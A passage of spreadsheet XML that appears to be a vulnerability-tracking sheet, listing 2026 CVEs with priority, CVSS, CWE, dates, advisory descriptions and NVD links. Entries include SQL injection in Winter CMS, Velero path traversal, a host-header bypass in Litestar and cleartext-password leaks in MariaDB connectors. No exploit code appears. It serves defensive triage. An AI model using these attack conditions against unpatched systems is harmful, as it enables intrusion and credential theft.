          <t>CWE-284</t>
        </is>
      </c>
      <c r="L4423" s="5" t="inlineStr">
        <is>
          <t>Improper access control in Collection prior to version 1.0.1.14 in Android 15 and 2.0.02.7 in Android 16 allows local attackers to access sensitive information.</t>
        </is>
      </c>
      <c r="M4423" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21105</t>
        </is>
      </c>
    </row>
    <row r="4424">
      <c r="A4424" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4424" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-32593</t>
        </is>
      </c>
      <c r="C4424" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4424" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4424" s="5" t="inlineStr"/>
      <c r="F4424" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4424" s="5" t="inlineStr"/>
      <c r="H4424" s="5" t="inlineStr"/>
      <c r="I4424" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J4424" s="5" t="inlineStr"/>
      <c r="K4424" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L4424" s="5" t="inlineStr">
        <is>
          <t>Winter CMS is a content management system built on the Laravel PHP framework. In versions up to and including 1.2.12, the backend Filter widget is vulnerable to SQL injection through the numberrange scope type when that scope is configured with a conditions key, allowing an authenticated backend user to inject arbitrary SQL. The scope's filter values are interpolated into the conditions statement without parameter binding, so a user with access to a list view whose filter uses this scope and configuration can supply crafted input through the filter's AJAX handler and read arbitrary database contents. No built-in Winter CMS backend views use this scope type and configuration combination, so exploitation requires a third-party plugin to have registered a numberrange filter scope with a conditions key, and a vanilla installation without such plugins is not affected. This issue is fixed in version 1.2.13.</t>
        </is>
      </c>
      <c r="M4424" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-32593</t>
        </is>
      </c>
    </row>
    <row r="4425">
      <c r="A4425" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4425" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-32637</t>
        </is>
      </c>
      <c r="C4425" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4425" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4425" s="5" t="inlineStr"/>
      <c r="F4425" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G4425" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="H4425" s="5" t="inlineStr"/>
      <c r="I4425" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J4425" s="5" t="inlineStr"/>
      <c r="K4425" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L4425" s="5" t="inlineStr">
        <is>
          <t>Velero is an open source tool for backing up, restoring, and migrating Kubernetes cluster resources and persistent volumes. Prior to 1.18.1, an attacker who compromises the backup object-storage backend can upload a malicious backup tarball containing parent-directory paths that escape the extraction directory during restore and overwrite sensitive files in the Velero pod filesystem. This issue is fixed in version 1.18.1.</t>
        </is>
      </c>
      <c r="M4425" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-32637</t>
        </is>
      </c>
    </row>
    <row r="4426">
      <c r="A4426" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4426" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-37171</t>
        </is>
      </c>
      <c r="C4426" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4426" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4426" s="5" t="inlineStr"/>
      <c r="F4426" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4426" s="5" t="inlineStr"/>
      <c r="H4426" s="5" t="inlineStr"/>
      <c r="I4426" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J4426" s="5" t="inlineStr"/>
      <c r="K4426" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L4426" s="5" t="inlineStr">
        <is>
          <t>A lack of tenant separation in SuperTokens Inc. SuperTokens Core v6.0.0 to v11.4.0 allows an authenticated party in one tenant to access sessions, data, and endpoints of another tenant.</t>
        </is>
      </c>
      <c r="M4426" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-37171</t>
        </is>
      </c>
    </row>
    <row r="4427">
      <c r="A4427" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4427" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45404</t>
        </is>
      </c>
      <c r="C4427" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4427" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4427" s="5" t="inlineStr"/>
      <c r="F4427" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4427" s="5" t="inlineStr"/>
      <c r="H4427" s="5" t="inlineStr"/>
      <c r="I4427" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="J4427" s="5" t="inlineStr"/>
      <c r="K4427" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-667</t>
        </is>
      </c>
      <c r="L4427" s="5" t="inlineStr">
        <is>
          <t>OpenTelemetry-Go is the Go implementation of OpenTelemetry. From version 0.11.0 through 1.44.0, the OpenTracing bridge's bridgeSpan contains an unsynchronized extraBaggageItems map which can cause a panic. Because Go maps are not safe for concurrent read/write access, concurrent SetBaggageItem and correlation.MapFromContext calls on the same hooked bridgeSpan can trigger a fatal runtime error—such as concurrent map read and map write or concurrent map iteration and map write—terminating the process and causing denial of service. This issue is fixed in version 1.45.0.</t>
        </is>
      </c>
      <c r="M4427" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45404</t>
        </is>
      </c>
    </row>
    <row r="4428">
      <c r="A4428" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4428" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45751</t>
        </is>
      </c>
      <c r="C4428" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4428" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4428" s="5" t="inlineStr"/>
      <c r="F4428" s="5" t="inlineStr"/>
      <c r="G4428" s="5" t="inlineStr"/>
      <c r="H4428" s="5" t="inlineStr"/>
      <c r="I4428" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J4428" s="5" t="inlineStr"/>
      <c r="K4428" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L4428" s="5" t="inlineStr">
        <is>
          <t>Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine. Prior to versions 7.0.16 and 8.0.5, Suricata's inspection-buffer helper could leave an inspection pointer referencing freed memory after a chained transform caused the backing buffer to be reallocated. The issue is reached during a specific network traffic processing, and requires a specific but not malicious rule. Versions 7.0.16 and 8.0.5 contain a fix. As a workaround, avoid rules that chain `dotprefix` transform after another one.</t>
        </is>
      </c>
      <c r="M4428" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45751</t>
        </is>
      </c>
    </row>
    <row r="4429">
      <c r="A4429" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4429" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45752</t>
        </is>
      </c>
      <c r="C4429" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4429" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4429" s="5" t="inlineStr"/>
      <c r="F4429" s="5" t="inlineStr"/>
      <c r="G4429" s="5" t="inlineStr"/>
      <c r="H4429" s="5" t="inlineStr"/>
      <c r="I4429" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J4429" s="5" t="inlineStr"/>
      <c r="K4429" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L4429" s="5" t="inlineStr">
        <is>
          <t>Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine. Starting in version 8.0.0 and prior to version 8.0.5, when certain detection transforms are chained, the decompress transform pipeline could read from an inspection buffer after it had been reallocated and freed. The issue is reached during network traffic processing, but requires a malicious rule as Suricata will crash whatever the traffic. Version 8.0.5 contains a fix. As a workaround, avoid rules that chain `gunzip` or `zlib_deflate` with `max-size` bigger than 4096 after another transform.</t>
        </is>
      </c>
      <c r="M4429" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45752</t>
        </is>
      </c>
    </row>
    <row r="4430">
      <c r="A4430" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4430" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45763</t>
        </is>
      </c>
      <c r="C4430" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4430" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4430" s="5" t="inlineStr"/>
      <c r="F4430" s="5" t="inlineStr"/>
      <c r="G4430" s="5" t="inlineStr"/>
      <c r="H4430" s="5" t="inlineStr"/>
      <c r="I4430" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J4430" s="5" t="inlineStr"/>
      <c r="K4430" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L4430" s="5" t="inlineStr">
        <is>
          <t>Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine. Starting in version 8.0.0 and prior to version 8.0.5, when Lua rule execution is enabled, the Lua sandbox memory limit was not consistently enforced for new allocations. Certain Lua allocation patterns could exceed `security.lua.max-bytes` without triggering the intended memory limit, making the configured sandbox limit unreliable. This requires Lua rules to be enabled and an affected Lua script/rule to be loaded. Version 8.0.5 contains a fix. As a workaround, disable `security.lua.allow-rules` unless Lua rules are required.</t>
        </is>
      </c>
      <c r="M4430" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45763</t>
        </is>
      </c>
    </row>
    <row r="4431">
      <c r="A4431" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4431" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45791</t>
        </is>
      </c>
      <c r="C4431" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4431" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4431" s="5" t="inlineStr"/>
      <c r="F4431" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4431" s="5" t="inlineStr"/>
      <c r="H4431" s="5" t="inlineStr"/>
      <c r="I4431" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J4431" s="5" t="inlineStr"/>
      <c r="K4431" s="5" t="inlineStr">
        <is>
          <t>CWE-613</t>
        </is>
      </c>
      <c r="L4431" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). Prior to 0.29.6, Dokploy's user.update procedure in apps/dokploy/server/api/routers/user.ts updates account.password without deleting other rows from session, allowing a compromised better-auth.session_token session to remain valid for up to three days after a password change. This issue is fixed in version 0.29.6.</t>
        </is>
      </c>
      <c r="M4431" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45791</t>
        </is>
      </c>
    </row>
    <row r="4432">
      <c r="A4432" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4432" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48061</t>
        </is>
      </c>
      <c r="C4432" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4432" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4432" s="5" t="inlineStr"/>
      <c r="F4432" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4432" s="5" t="inlineStr"/>
      <c r="H4432" s="5" t="inlineStr"/>
      <c r="I4432" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J4432" s="5" t="inlineStr"/>
      <c r="K4432" s="5" t="inlineStr">
        <is>
          <t>CWE-644</t>
        </is>
      </c>
      <c r="L4432" s="5" t="inlineStr">
        <is>
          <t>Litestar is an Asynchronous Server Gateway Interface (ASGI) framework. In versions prior to 2.22.0, an attacker can bypass the allowed hosts validation by omitting the Host header and supplying an X-Forwarded-Host header set to a whitelisted domain. The AllowedHostsMiddleware trusts the X-Forwarded-Host header as a fallback when the Host header is absent. Since X-Forwarded-Host is a client-controllable header, this enables host header injection attacks such as password reset poisoning, cache poisoning, and server-side request routing manipulation. Any application using AllowedHostsConfig is affected when deployed without a reverse proxy that strips X-Forwarded-Host, or when accepting HTTP/1.0 connections. This issue has been fixed in version 2.22.0.</t>
        </is>
      </c>
      <c r="M4432" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48061</t>
        </is>
      </c>
    </row>
    <row r="4433">
      <c r="A4433" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4433" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48154</t>
        </is>
      </c>
      <c r="C4433" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4433" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4433" s="5" t="inlineStr"/>
      <c r="F4433" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4433" s="5" t="inlineStr"/>
      <c r="H4433" s="5" t="inlineStr"/>
      <c r="I4433" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J4433" s="5" t="inlineStr"/>
      <c r="K4433" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="L4433" s="5" t="inlineStr">
        <is>
          <t>GoRest is a Golang starter kit built with the Gin framework for prototyping and developing RESTful APIs. In versions prior to 1.12.2 nMemorySecret2FA contains a race condition due to an unsynchronized package-level map used to store 2FA secrets. Multiple HTTP handlers in handler/login.go and handler/twoFA.go read from and write to this map concurrently, and because Go's runtime treats unsynchronized concurrent map access as an unrecoverable fatal error, an attacker can repeatedly trigger this condition to crash the process on demand. This results in high, repeatable availability impact with no confidentiality or integrity consequences. This issue has been fixed in version 1.12.2.</t>
        </is>
      </c>
      <c r="M4433" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48154</t>
        </is>
      </c>
    </row>
    <row r="4434">
      <c r="A4434" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4434" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49343</t>
        </is>
      </c>
      <c r="C4434" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4434" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4434" s="5" t="inlineStr"/>
      <c r="F4434" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4434" s="5" t="inlineStr"/>
      <c r="H4434" s="5" t="inlineStr"/>
      <c r="I4434" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J4434" s="5" t="inlineStr"/>
      <c r="K4434" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-772</t>
        </is>
      </c>
      <c r="L4434" s="5" t="inlineStr">
        <is>
          <t>Klever-Go is the Go implementation of the Klever blockchain protocol. In versions prior to 1.7.18, the account-data trie syncers are vulnerable to a resource-exhaustion flaw that leaks bounded throttler slots on error paths. In syncDataTrie() (in both userAccountsSyncer.go and kappAccountsSyncer.go), StartProcessing() reserves a slot from the NumGoRoutinesThrottler, but the corresponding EndProcessing() is only called on the success path and on the duplicate-root early return. As a result, any error from trie.NewTrie(), trie.NewTrieSyncer(), or trieSyncer.StartSyncing() (including the network-dependent timeout path) permanently consumes one slot for the lifetime of the throttler. An attacker who can repeatedly cause trie-node sync failures or timeouts during bootstrap can exhaust the bounded throttler, after which further account-data trie syncs stop making progress and SyncAccounts() returns a timeout. Because epoch bootstrap in syncUserAccountsState() and syncKappAccountsState() aborts on any such error, this causes bootstrap to fail, a core availability issue affecting fresh, restarting, or resyncing nodes and validators. This issue is fixed in version 1.7.18.</t>
        </is>
      </c>
      <c r="M4434" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49343</t>
        </is>
      </c>
    </row>
    <row r="4435">
      <c r="A4435" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4435" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49837</t>
        </is>
      </c>
      <c r="C4435" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4435" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4435" s="5" t="inlineStr"/>
      <c r="F4435" s="5" t="inlineStr"/>
      <c r="G4435" s="5" t="inlineStr"/>
      <c r="H4435" s="5" t="inlineStr"/>
      <c r="I4435" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J4435" s="5" t="inlineStr"/>
      <c r="K4435" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L4435" s="5" t="inlineStr">
        <is>
          <t>GoBGP is an open source Border Gateway Protocol (BGP) implementation in the Go Programming Language. Versions prior to 4.6.0 contain a BGP OPEN capability parsing issue where several concrete capability decoders may parse data from the full remaining capability buffer instead of the slice bounded by the declared capability length, `CapLen`. A malformed BGP OPEN message can cause bytes from a following capability to be interpreted as part of the current capability. The most security-relevant case is the 4-octet AS capability, where a capability with `CapLen == 0` may cause the parser to read bytes from the following capability as the 4-octet AS value. This parsed value may later affect peer AS validation during BGP session establishment. Version 4.6.0 patches the issue.</t>
        </is>
      </c>
      <c r="M4435" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49837</t>
        </is>
      </c>
    </row>
    <row r="4436">
      <c r="A4436" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4436" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49838</t>
        </is>
      </c>
      <c r="C4436" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4436" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4436" s="5" t="inlineStr"/>
      <c r="F4436" s="5" t="inlineStr"/>
      <c r="G4436" s="5" t="inlineStr"/>
      <c r="H4436" s="5" t="inlineStr"/>
      <c r="I4436" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J4436" s="5" t="inlineStr"/>
      <c r="K4436" s="5" t="inlineStr">
        <is>
          <t>CWE-129</t>
        </is>
      </c>
      <c r="L4436" s="5" t="inlineStr">
        <is>
          <t>GoBGP is an open source Border Gateway Protocol (BGP) implementation in the Go Programming Language. Prior to version 4.7.0, GoBGP accepts a zero-length AS_PATH during UPDATE decoding and later panics while validating that attribute for a confederation eBGP peer. The vulnerable path is in the BGP UPDATE validator: a malformed UPDATE that should be rejected as a malformed AS_PATH instead reaches an unchecked `p.Value[0]` access, allowing a configured confederation eBGP peer to trigger a denial of service. Version 4.7.0 patches the issue.</t>
        </is>
      </c>
      <c r="M4436" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49838</t>
        </is>
      </c>
    </row>
    <row r="4437">
      <c r="A4437" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4437" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49870</t>
        </is>
      </c>
      <c r="C4437" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4437" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4437" s="5" t="inlineStr"/>
      <c r="F4437" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4437" s="5" t="inlineStr"/>
      <c r="H4437" s="5" t="inlineStr"/>
      <c r="I4437" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J4437" s="5" t="inlineStr"/>
      <c r="K4437" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L4437" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT is an IT asset/license management system. Prior to 8.6.1, POST /two-factor has no rate limiting, lockout, or attempt counter, allowing an attacker with valid credentials to submit unlimited TOTP guesses against the three accepted codes created by config/google2fa.php window=1. A successful guess creates a fully authenticated session. When two_factor_enabled is 1, POST /account/profile with two_factor_optin=0 can disable two-factor authentication without OTP reverification, while required mode 2 prevents that opt-out. An administrator can also use POST /api/v1/users/two_factor_reset to clear another user's secret. This issue is fixed in version 8.6.1.</t>
        </is>
      </c>
      <c r="M4437" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49870</t>
        </is>
      </c>
    </row>
    <row r="4438">
      <c r="A4438" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4438" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50558</t>
        </is>
      </c>
      <c r="C4438" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4438" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4438" s="5" t="inlineStr"/>
      <c r="F4438" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4438" s="5" t="inlineStr"/>
      <c r="H4438" s="5" t="inlineStr"/>
      <c r="I4438" s="5" t="inlineStr">
        <is>
          <t>2026-07-29</t>
        </is>
      </c>
      <c r="J4438" s="5" t="inlineStr"/>
      <c r="K4438" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L4438" s="5" t="inlineStr">
        <is>
          <t>Penelope Shell Handler is a post-exploitation shell handler for authorized security testing. Prior to 0.20.0, the Unix download() implementation in penelope.py used tar.extractall(local_download_folder) on tar archives returned by remote sessions without validating member paths, allowing a malicious or compromised session to write files outside the intended download directory and potentially overwrite ~/.penelope/peneloperc. This issue is fixed in version 0.20.0.</t>
        </is>
      </c>
      <c r="M4438" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50558</t>
        </is>
      </c>
    </row>
    <row r="4439">
      <c r="A4439" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4439" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52739</t>
        </is>
      </c>
      <c r="C4439" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4439" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4439" s="5" t="inlineStr"/>
      <c r="F4439" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4439" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="H4439" s="5" t="inlineStr"/>
      <c r="I4439" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J4439" s="5" t="inlineStr"/>
      <c r="K4439" s="5" t="inlineStr">
        <is>
          <t>CWE-248</t>
        </is>
      </c>
      <c r="L4439" s="5" t="inlineStr">
        <is>
          <t>ZEBRA is a Zcash node written entirely in Rust. Prior to 4.5.0, a malicious block producer can terminate zebrad by placing the same shielded transaction in a non-finalized parent block and its child. In zebra-state/src/service/non_finalized_state/chain.rs, Chain::push originally inserted the transaction hash into tx_loc_by_hash and asserted uniqueness before updating shielded data and running the duplicate Sprout, Sapling, or Orchard nullifier checks. The repeated transaction therefore reached the transactions must be unique within a single chain assertion before contextual validation could reject it cleanly. Zebra release builds use panic equals abort, so the reachable assertion terminates the entire process; exploitation requires either two consecutive attacker-mined blocks or an attacker-mined child immediately after an honest block includes the attacker's shielded transaction. This issue is fixed in version 4.5.0.</t>
        </is>
      </c>
      <c r="M4439" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52739</t>
        </is>
      </c>
    </row>
    <row r="4440">
      <c r="A4440" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4440" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55854</t>
        </is>
      </c>
      <c r="C4440" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4440" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4440" s="5" t="inlineStr"/>
      <c r="F4440" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4440" s="5" t="inlineStr">
        <is>
          <t>node.js, mysql</t>
        </is>
      </c>
      <c r="H4440" s="5" t="inlineStr"/>
      <c r="I4440" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J4440" s="5" t="inlineStr"/>
      <c r="K4440" s="5" t="inlineStr">
        <is>
          <t>CWE-319, CWE-522</t>
        </is>
      </c>
      <c r="L4440" s="5" t="inlineStr">
        <is>
          <t>MariaDB Connector/Node.js is used to connect applications developed on Node.js to MariaDB and MySQL databases. Prior to 3.2.4, 3.3.3, 3.4.6, and 3.5.3, MariaDB Connector/Node.js can disclose an account password when PAM dialog authentication is negotiated over an insecure transport. In lib/cmd/handshake/auth/pam-password-auth.js and lib/cmd/handshake/authentication.js, the SendPamAuthPacketFactory behavior for the server-side plugin dialog lacked the secure-transport gate applied to mysql_clear_password. With the default sslMode=DISABLE and restrictedAuth=null settings, a hostile or on-path server can send an Authentication Switch Request for dialog over plain TCP, causing the connector to return the account password in cleartext. Properly verified TLS and a local Unix socket prevent this path, while fingerprint-only server identity validation is not sufficient. This issue is fixed in versions 3.2.4, 3.3.3, 3.4.6, and 3.5.3.</t>
        </is>
      </c>
      <c r="M4440" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55854</t>
        </is>
      </c>
    </row>
    <row r="4441">
      <c r="A4441" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4441" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55856</t>
        </is>
      </c>
      <c r="C4441" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4441" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4441" s="5" t="inlineStr"/>
      <c r="F4441" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4441" s="5" t="inlineStr">
        <is>
          <t>java, mysql</t>
        </is>
      </c>
      <c r="H4441" s="5" t="inlineStr"/>
      <c r="I4441" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J4441" s="5" t="inlineStr"/>
      <c r="K4441" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="L4441" s="5" t="inlineStr">
        <is>
          <t>MariaDB Connector/J is used to connect applications developed in Java to MariaDB and MySQL databases. Prior to 2.7.14, 3.3.5, 3.4.3, and 3.5.9, when a Java application connects with sslMode=verify-full or sslMode=verify-ca, supplies a password, and does not configure serverSslCert or trustStore, Connector/J can accept an untrusted self-signed certificate through the fallbackToSystemTrustStore=true ephemeral trust manager and record its certFingerprint for later identity binding. The OK-packet and authentication-switch paths enforce the certificate fingerprint, but the initial-handshake path does not. HandshakeResponse.encode() can therefore build and send a mysql_clear_password response before checking certFingerprint != null &amp;&amp; !isMitMProof(), sslMode, or whether the authentication plugin is resistant to a man-in-the-middle, and the initial path also bypasses restrictedAuth. An active man-in-the-middle or hostile server can present a self-signed certificate, claim to be MariaDB, select mysql_clear_password as the initial authentication plugin, and receive the full database password before the connection is rejected. This issue is fixed in versions 2.7.14, 3.3.5, 3.4.3, and 3.5.9.</t>
        </is>
      </c>
      <c r="M4441" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55856</t>
        </is>
      </c>
    </row>
    <row r="4442">
      <c r="A4442" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4442" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55857</t>
        </is>
      </c>
      <c r="C4442" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4442" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4442" s="5" t="inlineStr"/>
      <c r="F4442" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4442" s="5" t="inlineStr">
        <is>
